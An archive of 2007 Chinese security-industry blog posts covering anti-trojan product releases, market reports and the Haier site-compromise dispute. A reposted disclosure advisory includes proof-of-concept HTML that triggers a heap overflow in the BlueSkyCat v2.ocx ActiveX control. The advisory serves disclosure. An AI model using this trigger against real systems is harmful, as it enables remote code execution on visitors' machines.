野路子

超级巡警保险箱1.0 beta

wlj — Sat, 25 Aug 2007 20:01:34 +0800

拖了差不多一年了，超级巡警的这个保险箱一直还在内部的beta测试中，直到360推出了他们的保险箱……

看来，公司要考虑的，远不止是技术领先啊。

您还在QQ、网游、网银账号被盗担心么？
超级巡警的保险箱的功能，是我们特别为账号保护设计的功能，全面保护你的账号安全。
正常情况下，木马后门会通过各种方式，侵入我们使用的程序空间，来窃取你的密码，监听你的聊天记录。
保险箱杜绝了目前木马侵入用户进程空间的办法，即使你在中了木马的机子上网、聊QQ，你的QQ密码依然安然无恙。原因很简单，我们拒绝了一切非法的对QQ进程空间的操作。使得各种盗号手段失效。
当用来保护IE后，目前流行的各种插入IE反弹的木马全部失效，原因很简单，无法打开和插入IE进程，无法在IE中创建远线程，窃取各种IE密码的网银盗号程序失效，因为不允许任何第三方钩子挂入，无论是键盘钩子还是消息钩子。
使用方法（以保护IE为例）：

1、启动超级巡警保险箱
2、点添加按钮，将我们要保护的程序添加到进来(IE 安装目录，一般是：c:\Program Files\Internet Explorer\，IEXPLORE.EXE添加进来)。
3、双击列表中的显示IEXPLORE.EXE那行，启动IE上网。此时保险箱会提示你IE已经被超级巡警保险箱保护。
4、安心畅游网络。
5、当关闭IE的时候，超级巡警保险箱会提示IE结束，并告诉你拦截了一些试图插入IE进程的程序模块，对于专业人员而言，可以通过拦截的模块分析，发现到机子中的恶意木马，普通用户不用理会。

点击下载超级巡警保险箱1.0 BETA，可能未必非常稳定，帮俺们测试的朋友们，请稍加留心，不要在重要的服务器上使用 :)

苹果的Boot Camp Beta 1.4

wlj — Sat, 25 Aug 2007 20:00:13 +0800

在 MAC MBP 机器上使用 Boot Camp Beta 1.4 运行 Windows XP，因为 MBP 的键盘鼠标有些独到之处，因此使用上也有些小区别：
1、键盘
Windows键 -> 苹果键
PrintScreen -> Fn-F11
Print Active Windows -> Option-Fn-F11
Number Lock -> Fn-F6
2、右键点击
两个手指放在触摸板上，并且点击按键。
3、Ghost 能够很好地与 Boot Camp 兼容，因此还能跟以前用 IBM 本子那样，做好先做个 GHOST。

4、MBP的键盘灯，在光线充足的地方无法调出，只有在环境光线降低到一定程度时，才会被激活。

多跟研发交流还是有好处的

wlj — Sat, 25 Aug 2007 19:58:20 +0800

今天下午，研发部门开会讨论用户反馈的新需求以及对实现的路线做些推敲，我厚着脸皮凑上去旁听（其实也听不懂多少了），结果感觉，还是大有收获。
比如，前些时候，在某个论坛上看到有网友在咨询：“使用文档加密产品的时候，如果计算机突然断电，是否文档的损坏机率会增大很多？”
我的第一反应是：那是当然……假设一个50兆的图纸，未加密时存盘，可能耗时5秒。可是如果用高强度的算法加密，这一存盘，可能就花上个8秒9秒了，要是非要在存一半时嘎奔一声断了电，那谁也没戏。
所以，有时候用户问起这类问题，我让销售回应的是：如果对可靠性要求高，那建议上个UPS，否则，即使是不上铁卷，AutoCAD写文件写到一半断电，照样得丢文档。
结果，今儿才知道，原来glacier N久以前，就用了个很简单的办法，避开了这个问题，所以，俺们以后可以很得意地说：“放心吧，用铁卷，即使突然断电，只要你硬盘没坏，那最多你没存盘的东西丢了，文件是不会坏的。”可是glacier没把这当回事，也不认为这个特性值得宣传──不知道铁卷里还有多少这样的小特点，glacier同学若无其事地没跟我说呢……
看来，多跟研发交流，还是有好处，而且非常有必要的 :)

新闻

wlj — Sat, 25 Aug 2007 19:57:25 +0800

遭遇滑铁卢 SCO的股票下跌72%

不是不报，时候未到。现在SCO应该明白，什么叫聪明反被聪明误了吧。一家科技创新型企业，不以创新为本，却阻挠创新和试图通过这种阻挠来赚取利润，在 SCO工作的人群中，只怕一是律师和财务人员比技术人员多。二是技术人员极度缺乏尊严，恐怕出门都不敢说自己在哪家公司上班……

周鸿一埋下定时炸弹阿里巴巴面临巨额索赔

这个略有点搞，当年的买卖交易，一旦离手，概不退换。本来就该是在马云的计算之内了。至于周，就且看何时再报了。我对他的确是佩服得五体投地，但我又觉得，这个世界不应该是这样的。

小浩蠕虫(xiaohao.exe)分析与解决方案

网友艾玛提示下，DSWLAB发了个蠕虫分析和解决方案。

招聘Windows软件开发和测试人员

wlj — Sat, 25 Aug 2007 19:56:16 +0800

大成天下只是信息安全行业里的一家小公司，团队气氛比较好，在这儿工作，压力未必小，但心情应该可以比较舒畅。团队的技术负责人（glacier、killer……）在技术上是毫不藏私的，如果希望快速成长，不妨来看看。可以通过智联招聘发送简历，也可以将简历直接投递到hr@unnoo.com，所有简历都是俺在看，要有兴趣，不妨试试。招聘的职位包括：

[separator]

Windows软件开发2人

应聘条件
a、熟悉 C++ 编程语言，熟练掌握 VC 或 BCB 等常用开发工具；
b、熟悉 Windows 应用程序开发及 Socket 网络通讯编程，熟悉常见的应用层网络协议，具备数据库编程能力；
c、全职从事一年以上软件开发工作，熟悉软件开发流程；
d、具备独立钻研及解决问题的能力，具有较强的责任心及团队合作精神；
e、熟悉C/S程序开发；
f、熟悉界面开发；
e、有相关开发经验（需提供至少一项作品）。
优先条件
a、熟悉汇编语言、具备底层驱动开发能力者优先；
b、参与过多人协作的大、中型软件项目者优先。
参与项目
企业版防病毒软件界面及通讯模块
工作地点
深圳

测试工程师2人

岗位职责
1. 负责反木马产品的测试；
2. 制定测试计划，安装测试环境，编写测试脚本；
3. 执行产品测试，维护相应的测试记录；
4. 跟踪产品BUG解决情况，协助开发人员重现和解决；
5. 汇总测试结果，提交测试报告，分享测试经验。
知识和技能要求
1. 熟悉下列专业知识之一：
A. 具备软/硬件测试方面的经验，编写过测试计划和测试案例；
B. 能够编写简单测试工具或测试脚本；
2. 熟悉TCP/IP协议，能够独立组建网络测试环境；
3. 熟悉常见操作系统特性，具备一定的网络安全攻防技能；
4. 了解并掌握常见安全工具使用。
工作地点
哈尔滨、深圳

海尔：大企业也是允许犯错的

wlj — Mon, 13 Aug 2007 23:41:06 +0800

事件的原委：

1、8月11日，网友阿达、mopery的提示超级巡警团队，认为海尔的首页可能被挂马；
2、超级巡警团队检查后确认海尔官方首页被挂木马，因该网页头部存在： 代码，有网友认为是海尔网站服务器机房遭受ARP病毒欺骗，从而造成这一情况，经过Avert小组成员对该网段其它主机分析，初步否定了这一观点；
3、超级巡警团队发布DSW Lab Avert警报，提示该问题，链接可以参见：
http://dswlab.com/vir/v20070811.html
http://www.xsf.com/thread-13096-1-1.html
4、8月12日14:01分，网友skysecret访问海尔首页，问题已经修正。

本来事情到这里，皆大欢喜，可惜的是，后续的发展，让我有些诧异，首先是公司的服务邮箱接到了一封来自“一名海尔员工”的邮件，表面上似乎蛮客气的，可不知为啥，我却从语气里读出了些“店大欺客”的蛮横，邮件全文如下（也可以直接看图片）：

敬启者：
您好！我是一名海尔员工。在贵网上看到以下帖子：海尔官方网站首页被挂马；
链接：http://dswlab.com/vir/v20070811.html
上述帖子的内容涉及海尔的商业秘密，并且帖子制作者、发布者并未核实清楚即炮制
新闻对外公布，该帖子的存在极易引起广大网友的误解，
将给海尔的名誉带来极大的损害。
因此烦请尽快将上述帖子予以删除，以维护海尔的合法权益！
十分感谢！

还没处理呢，却发现，dswlab.com的域名被转向托管的IDC（也公布一下这家不负责任的IDC，idc45.com，俺反正是不建议用这家服务咧）了，很是纳闷，询问IDC时，IDC的联系人告诉我们：

海尔的正在找你呢，他们说你的网站对他们有不利的东西，说你对他们企业形象有不利，所以在他们的要求下，就转向了。他们是正规企业！而且提出要求。而且你是个人客户！我希望你还是尽快跟那个公司联系。说明情况。好像，你就是发了个文章说海尔网站上有木马！

我想说的是：网站被挂马不见他们什么动静，被人一爆料，却这么反应迅速地对俺们进行“还击”。其实，大企业也是允许犯错的，海尔的主页被挂木马，并不光彩，但用这种手段试图掩天下人之口，却未免太高看自己了。

不知道明天i170会不会收到一封请他们删除这篇BLOG的邮件，甚至被IDC直接下线……

续：刚才在QQ群里，一位兄弟告诉我个消息，权且作为本文的注脚吧：“海尔内部有文件发给各地渠道，每天必须在网络上搜索海尔的各种信息，特别是质量信息，在搜索结果中所有的论坛，新闻评论等可以发表言论的地方，针对海尔的产品，质量有关的话题必须发布指定数字的回帖。以保证其信息的正面性。”

再续：还是benjurry大度，又给气头上的俺浇了点水，他提示：“报之前，和对方沟通一下，效果可能会更好。这种沟通最简单的，可以是发一个邮件知会，表明我们的善意。”这点的确是我们的不足，多谢ben总提醒 :)

铁卷的成功案例

wlj — Mon, 13 Aug 2007 00:53:20 +0800

嘿嘿，有多少人是被标题骗进来的？
今儿有个哥们问我：“你们那个做电子文档保护的东西，到底卖没卖过啊？我看你们同行的网站上，大大小小成功案例，好歹都有个十来家啊。”
自家哥们都有这疑问，想必准客户们的疑虑是更大的，所以俺考虑，得解释解释……
在我看来，要成为好的“案例”，至少需要：

1、企业管理水平较高：这样的企业，采购行为更理性。并且在电子文档安全的管理规范上，也更易推行；
2、软件应用有代表性：目前这类软件最头痛的问题之一，想必就是与诸多应用软件，不仅是AUTODESK、UG这些二维三维的制图软件，也包括与PDM、MIS甚至ERP之类产品的整合。因此要作为“成功案例”，最好是软件应用上有其行业典型性；
3、网络环境有代表性：小网络怎么部署？中型网络如何部署？碰到企业员工在两万人以上，分处多个不同的物理位置，联网方式各异时，又该如何部署？

铁卷签的单子中，自然有大有小，符合上述条件的，还是有几家的，可是……

1、客户愿意让你拿来做宣传吗？
2、即使客户同意了，该公开宣传吗？

我的答案都是否定的，道理很简单，只是考虑到客户面临的文档泄露的威胁：

1、如果骇客了解到客户用的是XX电子文档安全系统，可能会方便其窃取资料；
2、如果意欲带走资料的员工了解到所用的产品，上网搜搜，说不定也能找到些“破解”秘笈（在当前恶性竞争的市场环境下，似乎并不太难……）；

换成你是采购电子文档安全系统的客户，你愿意名字被俺摆到网站上吗？（其实我印象中，多年前──至少五年了吧？虎哥就在某篇软文里抨击了一把安全厂商不顾安全，将客户采用的安全系统作为宣传性文章放到公开媒体进行宣传的事儿，只可惜，这种风气不但没刹住，反而成为市场竞争的一种“必备工具”了），所以，俺们也有成功案例列表，但是，会很小心地选择性分发，而不是公开宣扬。
顺便再吹嘘一下，在广东一位朋友（也是代理商）的建议下，铁卷很早就做进一个体贴的小功能：允许自定义终端名称。
也就是说，如果你的公司叫“张三科技”，那么你就可以将分发给员工的Agent取名为“张三科技电子文档安全系统”，一来，企业形象好；二来，这好歹也算虚晃一枪吧

有意思的阿里妈妈

wlj — Mon, 13 Aug 2007 00:52:25 +0800

一家家的公司并购案，显见网络广告蔚然成风。
而眼见google的adwords和百度的竞价广告日渐红火之际，阿里巴巴推出的新产品阿里妈妈，看来很有可能后来居上。
阿里妈妈，说白了就是网站的站长（包括BLOG的主人）可以通过她来卖广告位，而这个广告位的定价可以自主决定。
我觉得阿里妈妈的好处在于：

1、按时间计费和按点击计费：对小站长来说，选择按时间收费，可以避开被封帐号的苦恼；
2、更加透明和公平：相比adwords和百度的“封闭”，这种透明性可能会吸引更多小企业主。毕竟GOOGLE和百度里面，你投放了广告，效果如何，唯一的依据就是他们的广告监测系统；
3、与淘宝、支付宝的优势结合：C2C交易，他们具备天然优势，这块市场比较不容易被抢走；
4、BLOG们的热情，可能会带来一波病毒式营销的热潮，毕竟这是他们“赚钱”的机会，为这个机会做点儿宣传，相信大伙儿都愿意……

当然，也还是有风险的：

1、多少站长会买阿里妈妈的帐？当然，从目前来看，买帐的人还是相当多的，至少第一波的热情是足够了，看能不能持久吧，这个持久的动力可就是：从中赚到钱！
2、有多少广告主会买阿里妈妈的单？广告主是花钱的主儿，而有多少广告主会选择在互联网这么一大堆良莠不齐的网站里面选择合适的广告投放地？没有人力和精力来甄别优劣网站是一方面，还面临着是否有发票等财务问题……（从这里面看，似乎阿里妈妈还能再发展一类业务，就是替大客户来挑选合适他们的“网站群”，并且为他们做中介。）

反正阿里巴巴的阿里妈妈，是个有意思的创意，而且他们用了alimama.com这个域名，与阿里巴巴相对应，想必对其寄予的期望也不低。

超级巡警 4.0 beta4发布

wlj — Mon, 13 Aug 2007 00:49:01 +0800

超级巡警v4 beta4 改动：

1.正式开始美化皮肤，支持更换和升级皮肤文件，皮肤文件为skin.res，用户只需按照我们的要求制作自己喜爱的皮肤，使用皮肤工具生成皮肤库即可，皮肤库工具近期小范围测试发放。
2.增加更多的壳识别和壳种类检测。
3.解决卡巴斯基会在本程序加载时报警的提示。
4.修正补丁检查的小BUG，使得检查更为准确。
5.垃圾清理-智能扫描增加清除指定网页中代码的功能，可以用来批量修复被挂马的网页。
6.垃圾清理-文件粉碎机中增加阻止文件再生的功能，可以简单删除文件，并防止文件再生。
7.端口关联中，双击自动定位远程IP地址，修正一处小BUG。
8.内置最新特征库。

安装版下载：

http://update2.dswlab.com/ast_setup.exe
http://update3.dswlab.com/ast_setup.exe

绿色版下载：

http://update2.dswlab.com/ast.zip
http://update3.dswlab.com/ast.zip

顺便提一句，挂马的那帮人，越来越猖獗了，这不，今儿海尔被挂上了……

电子文档安全系统厂商及网址列表

wlj — Mon, 13 Aug 2007 00:48:52 +0800

这个表格是zzzevazzz贴到CHINACISSP论坛上的，同行可为师，记下来，俺可以时不时去学习一下。

为了突出俺们公司，俺高亮显示一下大成天下 ;)

公司　　　　产品　　　　　　　　　　　　网址
AirZip　　　FileSECURE　　　　　　　　http://www.airzip.com.cn/
MarkAny　 Document SAFER　　　　　 http://www.markany.com/china/default.htm
FASOO　　 FSD/FSF/FSN/Wrapsody　　 http://www.fasoo.com/
Microsoft　 Office(RMS+SharePoint) 　　http://www.microsoft.com/
大成天下　　铁卷电子文档安全系统　　　　http://www.unnoo.com/
北大方正　　重要文档防扩散解决方案　　　http://www.apabi.cn
江阴天恒　　天盾文档安全系统　　　　　　http://www.jycad.net/
安腾软件　　守望者2006　　　　　　　　http://www.itensoft.com/
前沿科技　　FD-DSM　　　　　　　　　　http://www.drm.net.cn/
思智泰克　　NET-LOCK　　　　　　　　　http://www.sagetech.com.cn/
北京书生　　商业机密保护系统　　　　　　http://www.sursen.com/
易核软件　　TEFS透明加密文件系统　　　 http://www.ecoresoft.com.cn/
SEFSTerm SEFS安全加密内核　　　　　 http://www.sefs.net/
亿赛通　　　文档安全管理系统　　　　　　http://www.esafenet.com/
新模式软件　图文档卫士　　　　　　　　　http://www.cmodes.com/
上海网伦　　信息安全保护系统　　　　　　http://www.jiami.com.cn/
华御信息　　智能防信息泄露系统　　　　　http://www.chinasecur.com/
济南华软　　金盾文档安全加密系统　　　　http://www.neiwang.cn/

危机公关？信任危机？

wlj — Fri, 03 Aug 2007 20:43:55 +0800

上午公司停电，但却偏有急事，非得上网不可，只得匆匆赶到科技园的上岛──那儿有无线。途中给coolc打了个电话，告诉他：我们到科技园了，你中午要有空，过来一块儿吃饭吧，俺们请。
coolc很客气地说：那怎么好意思……我请你们吧
我赶紧接上：好巧哦，你跟我想的一样耶……那就听你的吧……
吃饭的时候，提到包子（热烈欢迎包子兄弟来深圳，来这儿的哥儿们，看来，越来越多啦），然后由包子联想到了“纸箱馅包子”，想起来，觉得很有趣：

1、7月8日，北京电视台《透明度》栏目以“纸做的包子”为题播出了记者訾北佳暗访朝阳区一无照加工“纸箱馅包子”的节目。
2、北京市政府领导高度重视，王岐山市长当即批示：“如属实要严办，如属虚假，要公开澄清事实！”
3、7月17日，各大网站纷纷报导，确认《纸做的包子》已被证实为假新闻。
4、陆续有人质疑7-17的“假新闻”新闻才是假新闻。

反正我是糊涂了，河蟹社会下，政府相信人民吗？相信人民的判断能力吗？人民信任新闻传媒吗？人民信任政府吗？
这是一次危机公关，还是纯粹的信任危机引来民众的猜疑？

2006 IDC报告中IDS与IPS的市场占有量

wlj — Fri, 03 Aug 2007 20:41:46 +0800

IDS的市场占有率，启明星辰占了22.4%的份额，是当之无愧的老大。安氏的份额居然比绿盟高，倒是挺让我意外的。

但是，IPS的市场占有率，却是恐怖的一边倒，CISCO、Juniper、McAfee、TippingPoint、CheckPoint，一水的国外厂商，仅有绿盟撑着6.8%个点。

再看看IDC在2006-2011年安全市场规模预测中提到的，IDS增长乏力，IPS却日渐上扬，到2011年时，两者的规模会相当，看来……

超级巡警自动脱壳机能脱57种壳了：）

wlj — Fri, 03 Aug 2007 20:41:22 +0800

下载地址

http://update2.dswlab.com/VMUnpacker.zip
http://update3.dswlab.com/VMUnpacker.zip

数据安全实验室(DSWLAB) 出品

[separator]

V1.2 改动

感谢众多网友的测试反馈，本版改动较多，值得升级使用!
1.修正了upack 0.32以后版本脱壳时一个仿真异常的BUG。
2.修正虚拟机内部某API的一个bug。
3.修正脱较大文件时的内存管理问题。
4.增加更多的系统特性仿真。
5.增加自动保存和追加附加数据(Overlay)功能，有部分程序(木马)，需要附加数据才能运行。
6.相对1.1增加了6种壳支持，目前本版经过测试验证支持的壳列表(57种300个版本)：

upx 0.5x-3.00 All Version
BeRoEXEPacker
aspack 1.x--2.x All Version
PEcompact 0.90--1.76 2.06--2.79 All Version
fsg v1.0 v1.1 v1.2 v1.3 v1.31 v1.33 v2.0 All Version
vgcrypt v0.75
nspack 1.4--4.1 All Version
expressor v1.0 v1.1 v1.2 v1.3 v1.4 v1.501 / 网友称闪电壳
npack v1.5 v2.5 v3.0
dxpack v0.86 v1.0
!epack v1.0 !epack v1.4
bjfnt v1.2 v1.3
mew5 mew v1.0 v1.1
packman v1.0
PEDiminisher v0.1
pex v0.99
petite v1.2 v1.3 v1.4 v2.2 v2.3 All Version
winkript v1.0
pklite32
pepack v0.99 v1.0
pcshrinker v0.71
wwpack32 1.0--1.2
upack 0.1--0.32 0.33--0.399
rlpack 1.11--1.14 1.15--1.18
exe32pack v1.42
kbys v0.22 v0.28 / 网友称涛涛压缩器
yoda's protector v1.02 v1.025 v1.03.2
yoda's crypt v1.1
yoda's crypt v1.2 v1.3 v1.xModify / 网友修改版
XJ / 国产仙剑望海潮壳
exestealth 2.72--2.76
hidepe v1.0 v1.1
jdpack v1.01 v2.1 v2.13
jdprotect 0.9b
PEncrypt v3.0 v3.1 v4.0
Stone's PE Crypt v1.13
telock v0.42 v0.51 v0.60 v0.70 v0.71 v0.80 v0.85 v0.90 v0.92 v0.95 v0.96 v0.98 v0.99
ezip
hmimys_pack v1.0
lamecrypt v1.0
depack
polyene v0.01
dragonArmour
EP Protector v0.3
PackItBitch
trojan_protect / 木马彩衣 //国内常用的木马伪装工具
anti007 v2.5 v2.6
mkfpack
yzpack v1.1 v2.0
spack method1 spack method2
naked packer v1.0
upolyx v0.51
stealthPE v1.01 stealthPE v2.2
mslrh v0.31 v0.32
mslrh v0.2 == [G!X]'s Protect
morphine v1.3 morphine v1.6 morphine v2.7
rlpack full edition

..\TestFils 目录中有几个测试样例文件。

V1.1 改动

1.修正一些不稳定的因素，更简单易用，去除了一些暂时不稳定的壳支持。
2.对我们验证过的壳，程序增加脱壳失败提示将文件发送给我们分析。
3.在脱壳崩溃时提示发送错误报告给我们。
4.修正部分壳在脱壳后无法运行问题。
4.其它更多改进自行挖掘。

2006年IDC报告摘录

wlj — Fri, 03 Aug 2007 20:39:24 +0800

上周因为要写点东西，四处找朋友索取各种市场报告，比如IDC的《China IT Security Market Analysis 2006 and 2007-2011 Forecast》，要写的东西也写完了，但有些数据或文字，觉得值得记的，权且抄录一下，也如falcon兄所说，可以和大伙儿共享 :)

2006年防病毒软件市场中的主要特点
新兴子市场的拓展。在2006年,反“流氓软件”已经成为一个主要的新兴市场。实际上,多数主流厂商在该市场采取的策略并非直接销售产品、以谋得利润。而是采用了免费提供产品,来达到品牌的强化和市场宣传作用。
针对消费市场的产品差异化策略。在2005年,主流厂商开始推动“互联网安全套件”这类安全内容管理软件。在2006年,这种推动得到了本质的加强,并最终形成市场格局。目前,主流安全厂商均拥有“普通反病毒产品”和“互联网安全套件”两条不同的产品线,以满足不同用户群体的要求。这种差异化也为厂商在市场营销和宣传上提供了充安操作空间。
行业的切入上依然艰难。在消费类市场领先的主流防病毒厂商向企业级市场的切入依然效果不大,同样,在企业级领先的主流防病毒厂商在消费类市场也依然没有取得很好的成绩。

关于瑞星

2006年,瑞星针对目前的产品销售情况调整产品战略:对软件产品,要保住一流的市场地位。其策略重点在于:保住单机版市场,争取企业版市场。对硬件产品,目前瑞星已经去除了IDS、防毒墙低端、防火墙高端产品线,集中力量发展中低端防火墙和中高端防毒墙产品线。
瑞星的渠道基本上可以分为四级,不同层级之间的渠道可以得到不同的折扣和返点,但是为了保持整个市场价格的稳定,各层级之间的折扣和返点差越来越小。

瑞星面临的一个挑战：个人用户市场购买能力下降。从2003年开始,中国的个人用户开始大规模购买SCM产品,瑞星在这个市场的成功营销,使得瑞星取得了巨大成功。从目前的情况来看,个人用户购买SCM产品的增长速度情况已经开始有所下降,这导致了瑞星在该市场的增长已经放缓。

关于安全内容管理软件
安全内容管理软件是整体安全软件中占比最大的子市场,在2007年,预计该市场的市场规模为US$129.7M,相对于2006年增长了26.9%。
未来五年内,安全内容管理的复合增长率为20.8%,预计到2011年,该市场的市场规模将达到US$262.7M。
安全内容管理软件市场未来五年的预测如下图所示:

IDC的建议

用户以工程学的方式来应对安全威胁。在现有安全产品基础之上,加入适当的安全管理、安全培训和安全服务。这一点对建设相对完善的安全应对机制尤为重要。

主流厂商在重点行业推进。将相对有限的资源,投入到重点的几个行业中。针对于不同行业的特点,定制化产品、市场营销体系以及渠道策略。

主流厂商努力完善“售后服务”。厂商可尝试建立“售后服务”——“新的用户需求”——“定制行业产品”的良性体系,更好地为做深行业打下坚实的基础。

保持企业的平衡性。IDC建议各个厂商应该在产品、市场、渠道、政府管理和客户关怀上投入相对平衡的资源,而不是在某一块有特殊的倾斜,否则随时时间推移和安全市场竞争的进一步加剧,会出现“短板”削弱自身的竞争优势。

风物长宜放眼量

wlj — Thu, 02 Aug 2007 16:17:24 +0800

前面几天，没事总会去看看China CISSP论坛，原因是上面有几个针对电子文档安全的讨论，觉得蛮有趣的。几个贴子的链接分别是：

可这一两天看，却发现内容已经变成骂战和揭短，而且相当一部份内容是不切实际的（那些帖子里也有指着大成天下说些不知所云的“漏洞”，甚至认为某个ID是俺马甲的），苦笑。

不过，看到思智的人比较理性地做了个“官方回应”，还是相当不错的。

我还是认为，电子文档安全与防泄密这个市场刚起步，内耗不如扎实研发和做市场工作，还是主席的话说说得好：牢骚太盛防肠断，风物长宜放眼量。

顺时针和逆时针

wlj — Thu, 02 Aug 2007 15:57:58 +0800

下午arrow给我发了幅图片，大家可以看看，这个女孩是顺时针在转圈儿，还是逆时针？

果然是境由心造，思维定势很要命，我连原理示意图都看了，但却愣是死活看不出逆时针来……

明年抓两件事

wlj — Thu, 02 Aug 2007 15:56:38 +0800

还记得五六年前，在跟沈总提出一些非常稚嫩的对公司运营的意见时，沈总提到过，他一年只想做好两三件事情。这话一直记着。

今晚，有个很了解大成天下运营现状的兄弟，跟我说，明年，你就抓两件事情：

1、销售管理；

2、产品管理，指的是经营产品。

其实，要做好两件事，可能比要做好二十件事难得多。

IDC对安全市场的分类

wlj — Thu, 02 Aug 2007 15:56:12 +0800

一些总结2006，展望2007的文档

wlj — Tue, 31 Jul 2007 16:10:51 +0800

下午专心致志地看了一些falcon兄推荐的总结2006，展望2007的文档，其中包括：

2006年我国信息安全市场形势分析
2006年十大主线描绘信息安全变局
IDC 2007年中国IT与电信市场十大预测
赛门铁克：2007年安全趋势分析报告

获益良多，记录一下我比较感兴趣的一些内容：

通过对最终用户IT安全状况的长期跟踪调研，IDC发现最具威胁的IT安全问题中，排名前三位的都是和"安全内容管理"直接相关的安全问题。其中以病毒、木马及恶意代码最为严重。97.8%的用户遇到过类似的问题。

内容安全往往无法通过网络安全的对抗性措施来解决。要解决内容安全问题，主要是区别真伪，任何用户无法要求别人不要在网上设置陷阱，因此，要解决内容安全主要还是在内部网络来解决。基于特征码和行为分析的防病毒软件面对内容安全威胁的时候，效果不够理想。

中小企业与二、三级城市用户对安全产品的需求正在日益增加，由于中小企业的安全需求正在变得越来越复杂，安全风险也变得越来越大，这些企业开始对信息基础设施的保护进行投资。

安全内容管理(Secure Content Management)将成为复合成长率最高的信息安全产业，其中内网管理，包括"内贼"与"内敌"的问题，造就了内容管理器与Web安全网关设备的市场，成为未来三年热门的话题与趋势。Web浏览、IM聊天以及E-mail收发三大主流应用带来的安全问题，是企业网络应用最普遍的问题，也恰恰是传统的安全老三样不能够系统解决的问题。面对这样一个市场的空白，众多安全厂商有可能打造出一条"内容"的产品线。

内容安全技术走红：今年7月15日，萨班斯法案正式生效，这意味着Nasdaq的全球上市公司不得不提前部署这些最新的信息安全技术，以迎接即将到来的法律遵从挑战。然而，多数人并不知道，中国在2006年3月1日生效的公安部颁发的82号文件，对中国的互联网组织提出了同样新的要求--必须利用信息安全技术留存组织的相关上网记录，以便用于调查取证。国际国内两部不同的法规虽然编制的目的不同，然而殊途同归，均要求组织采用最新的信息安全技术，这悄悄地刺激内容安全技术开始在中国市场走红。

仅在2006年9月一天里就检测到1,000多个网络钓鱼消息。

趋势 3：保护输出数据(如：数据泄露)，数据泄漏事件的数量仍在逐年上涨，各种未经规划的通信手段(即时讯息和点对点等)在企业内部的盛行，使得敏感和机密信息面临重大泄漏风险，同时也令公司品牌信誉处于风险之中。为了对抗这种趋势，公司需要采取一种前瞻性的信息资产保护方法，除存储和恢复措施外，还能够在数据传输时采取保护措施，以降低数据泄露或内部欺诈的风险。公司需要多层次的数据泄露保护和专门的应用程序解决方案，通过监控数据库、电子邮件和网络应用程序所发出的全部数据来防止数据泄露。这将使得公司机构能够更经济高效地展现其在合规性方面的举措，并对有关电子邮件、即时讯息、数据库和文档服务器的信息保护政策做出快速响应。

准备从现在开始到下班再看几份大部头的分析报告：

赛迪：2006年中国网络安全产品与市场年度报告
中国信息安全产品测评认证中心：2004-2008美国信息安全产业发展
IDC：China IT Security Market Analysis 2006 and 2007-2011 Forecast
CNNIC：20070718_第20次互联网发展报告

视频语音聊天系统的漏洞

wlj — Tue, 31 Jul 2007 14:21:47 +0800

有个哥们最近在源代码漏洞发掘和黑箱测试方面有蛮大突破，下面是从他网站上转过来的，他用工具发现的视频语音聊天工具（包括碧聊等一堆的聊天网站都受影响）的漏洞。如果有企业有代码审计或黑盒测试方面的需求，不妨联系联系他 :)

CAL-20070730-1 BlueSkyCat ActiveX远程代码执行漏洞

我们是代码审计实验室(Code Audit Labs http://www.vulnhunt.com/).
为保护客户安全，我们对"蓝天专业可视语音聊天系统"blueskycat v2.ocx
(version 8.1.2.0) 文件做了下内部审计。blueskycat是应用广泛的语音和
视频聊天室软件，由blueSky.cn开发.

发现几处v2.ocx ActiveX的安全漏洞，远程攻击者可能利用此漏洞控制用户机器。

该文原始连接
1: http://www.vulnhunt.com/advisories/CAL-20070730-1_BlueSkyCat_v2.ocx_ActiveX_remote_heap_overflow_vulnerability.txt
2: http://CodeAudit.blogspot.com

CVE：
====
We request a CVE number to assign to this vulnerability.

细节：
=====

BlueSkyCat所安装的v2.ocx控件中的ConnecttoServer函数没有正确验证用户输入
参数,如果用户受骗访问了恶意页面的话，就可能触发堆溢出，导致执行任意指令。
从而控制安装有受影响版本的BlueSkyCat软件的用户机器。

以下您的客户的客户的机器都会受到影响
碧聊 http://www.bliao.com
QQ聊 http://www.qqliao.com
七聊 http://www.7liao.com
好聊 http://www.haoliao.net
我要聊 http://chat.51liao.net
圣域佛教 http://www.heshang.net
喜满你 http://vchat.xicn.net
CN104 http://www.cn104.com
学聊 http://www.liao-tian.com
情聊 http://www.aliao.net
快聊 http://www.kuailiao.com
模特聊 http://www.mtliao.com
北国娱乐网 http://www.pj0427.com
维语聊 http://chat.uighur.cn
舞魅聊 http://www.wmliao.com

受影响版本:
===========
v2.ocx version 8.1.2.0(当前最新版本) 和以前版本

厂家:
=====
BlueSky

测试代码：
========
<html>
<head>
<OBJECT ID="com" CLASSID="CLSID:{2EA6D939-4445-43F1-A12B-8CB3DDA8B855}">
</OBJECT>
</head>
<body>
<SCRIPT language="javascript">

function ClickForRunCalc()
{
var heapSprayToAddress = 0x0d0d0d0d;

var payLoadCode = "A" ;
while (payLoadCode.length <= 10000) payLoadCode+='A';
com.ConnecttoServer("1",payLoadCode,"3","4","5");
}
</script>
<button onclick="__javascript:ClickForRunCalc();">ClickForRunCalc</button>
</body>
</html>

代码审计实验室建议：
==================
Code Audit Labs建议厂家自己进行一次全面的代码安全检查(Code Audit or Code
Review)，同时我们Code Audit Labs也提供代码审计(Code Audit)服务,假如您需要
我们的服务，请联系
mailto:Vulnhunt@gmail.com?subject=request code review service.

同时，为保护您所创建的价值，我们会等到您修复该漏洞后公告该漏洞。
假如您申请我们的Code Audit服务，那么，我们有义务为您保持该信息。

时间表：
======
1: 2007-07-29 通知厂家 (mail to blueskychat@gmail.com)
2: 2007-07-29 厂家回复说已经升级。
3: 2007-07-30 经过我们的确认，bluesky的客户都还没有升级他们的程序。
都还处在危险之中,发信通知vendor)
4: 2007-07-31 发布该漏洞

关于我们:
=========
代码审计实验室(Code Audit Labs)致力于自动化代码审计(包括源代码和二进制代码)
研究和开发,为提高软件安全测试的效率以及软件代码质量不懈努力.
Code Audit Labs信念: "您为客户创造价值，我们保护您创造的价值。"
http://www.VulnHunt.com

EOF

一些有意思的聊天记录

wlj — Tue, 31 Jul 2007 13:34:47 +0800

这些名言其实都是同一个人说的，牛逼的家伙呀

百度我觉得李彦宏有句话最牛B：“相信中国”。

这句话，我现在蛮有感觉的，如果说企业是船，无论是小木筏还是航空母舰，在中国市场的“水”上航行着，只要水涨，船就容易高，就比较容易事半功倍。

A说：周鸿一对360卫士的目标，1是干死雅虎，2是重振声威，现在360帮他全干到了。雅虎没了助手还有个屁流量，亲手把自己儿子干死了，周鸿一真牛B，第一，自己开创了一个市场。第二，又自己毁灭了这个市场。
B补充说明：儿子只要不是跟着自己，那就是敌人。

这个就纯粹只能汗了。

